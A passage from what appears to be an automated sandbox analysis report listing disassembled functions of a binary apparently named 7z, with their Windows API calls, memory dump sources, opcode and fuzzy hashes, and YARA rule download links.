                                • Opcode Fuzzy Hash: 761da570273301f57cb3c724173f51dde4d4af1ca4fe2fbc66553b6d42a3ddde
                                • Instruction Fuzzy Hash: 7AD0A711F27785C7EE8CE711A9A13581350E754308FC05429EE4F43704EB1CC08DC704
                                Function 0042B64C Relevance: 1.7, APIs: 1, Instructions: 457COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041BE6C: VariantClear.OLEAUT32 ref: 0041BE91
                                • free.MSVCRT ref: 0042BBE1
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ClearVariantfree
                                • String ID:
                                • API String ID: 1064583652-0
                                • Opcode ID: 1413fdc10e1ed70071e34278194cad587744285eeb2719e16b31325870020d54
                                • Instruction ID: edf1f4202980903fc1dbcd22c7016fef3d091b901df557dc3334cc6ad4ea7498
                                • Opcode Fuzzy Hash: 1413fdc10e1ed70071e34278194cad587744285eeb2719e16b31325870020d54
                                • Instruction Fuzzy Hash: EF121632308B9086CB75CB25F4902AFB761F395B80F944116DBDB47B24DBADD885C78A
                                Function 00428A08 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e1cdfd6a4b5c65e5f858a886ff12511c44938c6720d31dbf4f1bc7184a9a63f
                                • Instruction ID: 850ac23a2e650a90feae961613b28849bf46e45b48fe550df966d34eae6fc4af
                                • Opcode Fuzzy Hash: 8e1cdfd6a4b5c65e5f858a886ff12511c44938c6720d31dbf4f1bc7184a9a63f
                                • Instruction Fuzzy Hash: 27512E72306AD495C761CF2AE44029E7B61F785F98F98412BDF8A4B719CF79C881C714
                                Function 004473C4 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ByteString
                                • String ID:
                                • API String ID: 4236320881-0
                                • Opcode ID: 2c2e37631b715157dc41e9a515c137241c6488906a9e2a13e0927854e2735fe0
                                • Instruction ID: 187653a1d605142081058dbdf1ec804dda53df73726d3d9212e73a950b7cd255
                                • Opcode Fuzzy Hash: 2c2e37631b715157dc41e9a515c137241c6488906a9e2a13e0927854e2735fe0
                                • Instruction Fuzzy Hash: 00118E2271C78181E3308B19A8407BA6A60E7847A4F448322EFDA477E4EF3CCD878719
                                Function 00419F10 Relevance: 1.5, APIs: 1, Instructions: 41timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: FileTime
                                • String ID:
                                • API String ID: 1425588814-0
                                • Opcode ID: 4a3de73dfb10b1671eec32927cac63c902511c3d15486891ba1e2983bc9e8865
                                • Instruction ID: cff028fa8ab7b3ab32bac89d3378cc0bca7df3ec8732476bb30d43c951a6bee5
                                • Opcode Fuzzy Hash: 4a3de73dfb10b1671eec32927cac63c902511c3d15486891ba1e2983bc9e8865
                                • Instruction Fuzzy Hash: A501DB727042C097D710DB76A51479AFBD1B788BE8F188126EE4887B95D77CC886CB44
                                Function 004199CC Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004196F8: SetFilePointer.KERNELBASE(00000003,00000000,00000000,?,00419BD5), ref: 00419736
                                  • Part of subcall function 004196F8: GetLastError.KERNEL32 ref: 00419743
                                  • Part of subcall function 004196F8: SetLastError.KERNEL32 ref: 0041975C
                                • SetEndOfFile.KERNELBASE ref: 004199FB
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ErrorFileLast$Pointer
                                • String ID:
                                • API String ID: 1697706070-0
                                • Opcode ID: 7bc861c7b5eb5761a791ea73e4469635d3466af59617cd57f8b57b75ddb733e8
                                • Instruction ID: 57d8389ab1fb04041bbf3001a25d1baf3d4746fb57af631236a0b3a6f4488b76
                                • Opcode Fuzzy Hash: 7bc861c7b5eb5761a791ea73e4469635d3466af59617cd57f8b57b75ddb733e8
                                • Instruction Fuzzy Hash: 46E026723104E0D3E7208FA664A16EAC710AB447E4F984136EE4943B449A6D8CCA8704
                                Function 00416C28 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32 ref: 00416C5C
                                  • Part of subcall function 00413730: free.MSVCRT ref: 0041376A
                                  • Part of subcall function 00413730: memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: FileModuleNamefreememmove
                                • String ID:
                                • API String ID: 2942794927-0
                                • Opcode ID: 714446674f8f09c89ca169f9755ed8446007b42cc3d9ca7163880c561210c419
                                • Instruction ID: 238f66a82bc359eaab79b255aaffeb3fd4414053b1316c509349167abb558b03
                                • Opcode Fuzzy Hash: 714446674f8f09c89ca169f9755ed8446007b42cc3d9ca7163880c561210c419
                                • Instruction Fuzzy Hash: E0F09BB131464481EB208F11E45439B6360F749B84F845012DA8D4B394EF7DC699CF99
                                Function 00416BF0 Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00416B80: FreeLibrary.KERNELBASE(?,?,?,00416C03), ref: 00416B91
                                • LoadLibraryExW.KERNELBASE ref: 00416C10
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: Library$FreeLoad
                                • String ID:
                                • API String ID: 534179979-0
                                • Opcode ID: ec535dba14579e588a217dbf5588d92892c876ee5900133f57a0fc40d7a99ceb
                                • Instruction ID: 92bd39f3bdb1464c0e057414061671115a931ce44bebdebe466642863584e32e
                                • Opcode Fuzzy Hash: ec535dba14579e588a217dbf5588d92892c876ee5900133f57a0fc40d7a99ceb
                                • Instruction Fuzzy Hash: 95D02E2230222082EB102BA239922AA03059B05BE0F488031CF8D03B00EA2D8CEBA318
                                Function 004198B8 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: FileWrite
                                • String ID:
                                • API String ID: 3934441357-0
                                • Opcode ID: 2fb2f0fefd54e514cf6a40f39018a395235dd717ad2226923adce02d3f6e3b0a
                                • Instruction ID: 10e0a8bbfd2443a3bd199d0c619583bc6e333c94ef8d1a0c5c0d339e8de8c847
                                • Opcode Fuzzy Hash: 2fb2f0fefd54e514cf6a40f39018a395235dd717ad2226923adce02d3f6e3b0a
                                • Instruction Fuzzy Hash: 62E08C76318640CBE7508F60E40074AB3A0F388B24F004025DE8E83B84DBBDC144CF44
                                Function 004182EC Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CloseFind
                                • String ID:
                                • API String ID: 1863332320-0
                                • Opcode ID: 83abdbc612d9fe913b19c0aa44b7f33faef9c6a21742b24dbd4aaeadee3cbc7c
                                • Instruction ID: 108e96ffe371ccb8cd866be39a2f1b1efa305b938f87ec1165c5bafe31b36492
                                • Opcode Fuzzy Hash: 83abdbc612d9fe913b19c0aa44b7f33faef9c6a21742b24dbd4aaeadee3cbc7c
                                • Instruction Fuzzy Hash: ACD0C7B2601949C1DF211F7A9C443691355A754F74F1C5315DE744A3D0EF2988D68715
                                Function 004197B8 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 1a8169abdd710320b32848016f575c4d8c650cd2f5e1767a783909a1319054dd
                                • Instruction ID: e1facec79e6a031c5f4f69bdf310afc12f946b08c6f3799467ccee66466a33ae
                                • Opcode Fuzzy Hash: 1a8169abdd710320b32848016f575c4d8c650cd2f5e1767a783909a1319054dd
                                • Instruction Fuzzy Hash: 6ED05E76618684CBE7008F60E04575AF764F388B68F480004EF8847778CBBDC199CF00
                                Function 00416B80 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNELBASE(?,?,?,00416C03), ref: 00416B91
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 01109f61893c3e25e66fa0dd82789664d5e42eb5731ee3caf0e7fb23f98e379a
                                • Instruction ID: 7a15122c8a48ff5c0bb7e4da33dea3b58cd83d1ecf91ea062d9cf6e72e15a639
                                • Opcode Fuzzy Hash: 01109f61893c3e25e66fa0dd82789664d5e42eb5731ee3caf0e7fb23f98e379a
                                • Instruction Fuzzy Hash: A0D012B271761481FF154FA2A85077623549F58F44F5D5015CE1D8A340EB2DC8D5C714
                                Function 0041263C Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID:
                                • API String ID: 1795875747-0
                                • Opcode ID: f25a7451e5a52859bd194d4f45b432362e3ceccafce0c0a7c876b32af1063925
                                • Instruction ID: 4a1fb4901218d988a74f0788e1502ce1bf809ce85c1cf02a222898427bd119a6
                                • Opcode Fuzzy Hash: f25a7451e5a52859bd194d4f45b432362e3ceccafce0c0a7c876b32af1063925
                                • Instruction Fuzzy Hash: 3AD0A7D171470882CE109716D4003592321B788FC8F0440218E4D07714EA2CD1458B04
                                Function 00419878 Relevance: 1.5, APIs: 1, Instructions: 8timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: FileTime
                                • String ID:
                                • API String ID: 1425588814-0
                                • Opcode ID: 5e4364cb886039da5450fc3fd998d3b1d61beb249d97927aa7d82ce99975c606
                                • Instruction ID: 8bd34a4ee163b354924662fab93e117e847068577005f0366a57c23548330317
                                • Opcode Fuzzy Hash: 5e4364cb886039da5450fc3fd998d3b1d61beb249d97927aa7d82ce99975c606
                                • Instruction Fuzzy Hash: F0B09220B12440C2CB0C6722A89631C13A07788B15FE14429C60FD5690CE1C84A95700
                                Function 0043BF1C Relevance: 1.3, APIs: 1, Instructions: 85COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 9553adbc2b0cf8556eb9aec2fa57ade0ad41d00013f749b76379d9959dd4e0d3
                                • Instruction ID: 1ce543080f183c426a5d2ef628bd858fa12358364bc031a8525f697014337ef8
                                • Opcode Fuzzy Hash: 9553adbc2b0cf8556eb9aec2fa57ade0ad41d00013f749b76379d9959dd4e0d3
                                • Instruction Fuzzy Hash: AC210B3370425496C724DA1ABC4065BB250F34DBE8F20722AFF5687784DB7CC842CB88
                                Function 0041EAE0 Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8cc16c8876d987e3de5e17d18832af4d5879e21422368b64978be7a397600a75
                                • Instruction ID: c2239b2be14fccebb35d1da81da38f97d03a602ae310f3f7f52a55504b96baf7
                                • Opcode Fuzzy Hash: 8cc16c8876d987e3de5e17d18832af4d5879e21422368b64978be7a397600a75
                                • Instruction Fuzzy Hash: C31104BE61D65081DB35CB1A91807EAA391BF107C9F644007EE4B46710D72DE8D2C20E
                                Function 00452BB0 Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0043CA94: free.MSVCRT ref: 0043CAB1
                                  • Part of subcall function 0043CA94: free.MSVCRT ref: 0043CABD
                                  • Part of subcall function 0043CA94: free.MSVCRT ref: 0043CAC9
                                  • Part of subcall function 0043CA94: free.MSVCRT ref: 0043CAD5
                                  • Part of subcall function 0043CA94: free.MSVCRT ref: 0043CADE
                                  • Part of subcall function 0043CA94: free.MSVCRT ref: 0043CAE7
                                  • Part of subcall function 0043CA94: free.MSVCRT ref: 0043CAF0
                                • free.MSVCRT ref: 00452C15
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: d59108536d439d66a8f989801e68f7ac1a10c55ddb19c153846ac4e653761e0c
                                • Instruction ID: 1d0616cb6296c7b5a1ca5517c7406f88105435424882a9bd409a4092ef86cec4
                                • Opcode Fuzzy Hash: d59108536d439d66a8f989801e68f7ac1a10c55ddb19c153846ac4e653761e0c
                                • Instruction Fuzzy Hash: A7014C73610794CAC7229F2DC18116DBB24F759FE8328921BDB4907761E776C883C7A1
                                Function 0041921C Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 3060b14f209173f6a28d50149139effb67babbacf6fb131f3e42512a25668859
                                • Instruction ID: 21343f5dc0e63866e2a8ee37bdf345be1d7cda04368db17065c0f8b0b87fb6f2
                                • Opcode Fuzzy Hash: 3060b14f209173f6a28d50149139effb67babbacf6fb131f3e42512a25668859
                                • Instruction Fuzzy Hash: 36018F7B3522408AEB10CF25D56C39E3BA0A3D2B68F540209DB641B7D1C77EC54ACB94
                                Function 0041EF28 Relevance: 1.3, APIs: 1, Instructions: 32COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ErrorLast
                                • String ID:
                                • API String ID: 1452528299-0
                                • Opcode ID: 22fbc2d5e8199965c03e49c0b63e129300cee38c0b71475972f44996e2a71a3b
                                • Instruction ID: a18753fd0f097f193ddc1884e022e61db1f0bb6c1b5c811be0242496c2a30504
                                • Opcode Fuzzy Hash: 22fbc2d5e8199965c03e49c0b63e129300cee38c0b71475972f44996e2a71a3b
                                • Instruction Fuzzy Hash: 33F0A0B67500489BCB008F7A98802A922A1BB18795F94143AFF8B86311D62CCCDAC619
                                Function 004192D4 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: e16f68061b023a25359a80f0361e89c5542a2000306fd966a0e35091ec32aca1
                                • Instruction ID: db899280aa185ae9d8e2b68bff61ef979ac622190427d4c9ebfede43e58b45c3
                                • Opcode Fuzzy Hash: e16f68061b023a25359a80f0361e89c5542a2000306fd966a0e35091ec32aca1
                                • Instruction Fuzzy Hash: CEF0E1725296448E87A0DF29E44014ABBB0E3DA760B54122AB7EDC7A99E63CC544CF14
                                Function 0041EEE4 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041960C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 0041961E
                                • GetLastError.KERNEL32 ref: 0041EEF9
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CloseErrorHandleLast
                                • String ID:
                                • API String ID: 918212764-0
                                • Opcode ID: 00fa4f0c7f1adc1a366ac466b20b99f97a8cee801e5bb11324bbd4013cf968dc
                                • Instruction ID: a2fa24aa713fdbcac30aaff3324899ac84b359859d9412a7944640582952f2dc
                                • Opcode Fuzzy Hash: 00fa4f0c7f1adc1a366ac466b20b99f97a8cee801e5bb11324bbd4013cf968dc
                                • Instruction Fuzzy Hash: 40D05BA475014467EF215FBB18D43B501817718345FD4143BFE97C6352E55D8CCB552D
                                Function 0041960C Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 0041961E
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                • Opcode ID: 0d6a5ec00fd9bb15d2acceb7396023bc6caf58f05aff0577609e7a7fb7900fb0
                                • Instruction ID: 8b822f39f49116e0e47c9153fc6674c3ca4727d5a123ed3a6aac1d5211d64562
                                • Opcode Fuzzy Hash: 0d6a5ec00fd9bb15d2acceb7396023bc6caf58f05aff0577609e7a7fb7900fb0
